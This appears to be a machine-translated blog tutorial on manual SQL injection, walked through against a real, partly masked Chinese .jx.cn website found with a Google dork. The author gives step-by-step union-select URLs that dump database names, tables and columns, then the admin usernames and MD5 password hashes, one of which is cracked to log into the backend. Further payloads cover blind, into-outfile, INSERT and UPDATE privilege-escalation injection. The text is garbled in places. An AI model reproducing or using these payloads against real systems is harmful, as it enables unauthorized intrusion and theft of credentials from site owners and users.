The latest in the study of SQL manual injection, took a website to open the brush. The first is to find a SQL injection point, go to Google to find a random inurl:php?id=
There is a SQL injection point http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228 the link.
The first step is to carry out the injection test. The easiest way to do this is to add and 1=1 to the link and 1=2 if the page is not normal in and 1=2, and if it appears normal under and 1=2, the link has an injection point. The principle is: the statement of the general query is
SELECT * FROM table where id=1
That's what this test is for.
SELECT * FROM table where id=1 and 1=2
Second step, after you find the injection point, guess the number of fields in the current page
Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+order by 6</pre>
<pre escaped= "true" >http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+order by 7</pre>
<pre escaped= "true" >
Order by 6 displays correctly; Order 7 is not displayed correctly. Description field number is 6
Step three, burst the display bit of the current link
The corresponding number is the display position, showing a bit of 2 and 4</pre>
<pre escaped= "true" >http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,4,5,6 –-</pre>
<pre escaped= "true" >
The fourth step, burst the basic information of the database.
Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,concat (User (), 0x20,database (), 0x20,version ()), 5,6–-
User: People@localhost Database name: People version: 5.0.20a-log
All databases are burst:
Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (distinct+ Table_schema), 5,6+from+information_schema.columns--
Burst database name: information_schema,people,test
The INFORMATION_SCHEMA database was created after version 5.0 of MySQL, a virtual database that does not physically exist. The Nformation_schema database is similar to the "Data Dictionary", which provides access to database metadata in the form of data. such as database name or table name, column type, access rights (more granular access). INFORMATION_SCHEMA is a database of database metadata. It stores MySQL's database basic information. and change at any time. Used as an important information provider when viewing information and system decisions.
MySQL version 5.0 and above, we use the INFORMATION_SCHEMA database, to obtain information on other databases. Using the Group_concat () function, the distinct parameter plays a role in removing the repeated display.
The fifth part, according to the database table to burst all database table name:
Http://rsc.XXXx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (distinct+table_name), 5,6 +from+information_schema.tables+where+table_schema=database ()--
Admin1,answer,check,class,news,system,zhaoping
The page is news.php its database table must be the news table,
The sixth step, burst admin1 the field, then burst the user information, login backstage
The result of the Hex (16) of the admin1 is: 0x61646d696e31
Burst all the fields:
Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (distinct+ column_name), 5,6+from+information_schema.columns+where+table_name=0x61646d696e31--
Field: Id,admin,password,rank
And then burst the values in Admin and password:
Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (Distinct+id, 0x2b,admin,0x2b,password,0x2b,rank), 5,6+from+admin1--
1+admin+e10adc3949ba59abbe56e057f20f883e+0,
2+87046609+e10adc3949ba59abbe56e057f20f883e+1,
3+87046607+14a026642666897df2fcdcfe821af855+2,
4+87046608+e10adc3949ba59abbe56e057f20f883e+3,
5+87046605+9511364ffd98d4ac7fa9a4804b0e5669+4,
6+87046610+e10adc3949ba59abbe56e057f20f883e+5,
7+87046606+c11948f135f946ff173ca9b5d88465ca+6
The admin password MD5 decrypted to 123456,
It's OK.
This table queries:
[Url=]http://localhost/injection/user.php?username=angel ' [/url] and LENGTH (password) = ' 6
[Url=]http://localhost/injection/user.php?username=angel ' [/url] and left (password,1) = ' m
Union UNION statement:
[url=]http://localhost/injection/show.php?id=1 ' [/url] Union select 1,username,password from user/*
[url=]http://localhost/injection/show.php?id= ' [/url] Union select 1,username,password from user/*
Export File:
[Url=]http://localhost/injection/user.php?username=angel ' [/url] into outfile ' c:/file.txt
[url=]http://localhost/injection/user.php?username= ' [/url] or 1=1 into outfile ' C:/file.txt
[url=]http://localhost/injection/show.php?id= ' [/url] Union select 1,username,password from user into outfile ' c:/ User.txt
Insert statement:
Insert into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' $username ', ' $password ', ' $homepage ', ' 1 ');
Constructed homepage values are: [url=]http://4ngel.net ' [/url], ' 3 ') #
The SQL statement becomes: Insert into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' Angel ', ' mypass ', ' Http://4ngel '). Net ', ' 3 ') # ', ' 1 ');
UPDATE statement:
Understand this SQL first
Update user SET password= ' MD5 ($password) ', homepage= ' $homepage ' Where id= ' $id '
If this SQL is modified to the following form, the injection is implemented
1: Modify the homepage value to
[url=]http://4ngel.net ' [/url], userlevel= ' 3
The SQL statement then becomes
Update user SET password= ' mypass ', homepage= ' http://4ngel.net ', userlevel= ' 3 ' Where id= ' $id '
Userlevel for User Level
2: Modify the password value to
Mypass) ' Where username= ' admin ' #
The SQL statement then becomes
Update user SET password= ' MD5 (mypass) ' where username= ' admin ' #) ', homepage= ' $homepage ' where id= ' $id '
3: Modify ID value to
' or username= ' admin '
The SQL statement then becomes
Update user SET password= ' MD5 ($password) ', homepage= ' $homepage ' Where id= ' or username= ' admin '
Common MySQL built-in functions
DATABASE ()
USER ()
System_user ()
Session_user ()
Current_User ()
Database ()
Version ()
SUBSTRING ()
MID ()
CHAR ()
Load_file ()
Summary, for injection is the simplest and most error-prone, for the novice a lot of data is not filtered, for advanced may be server or logic problems.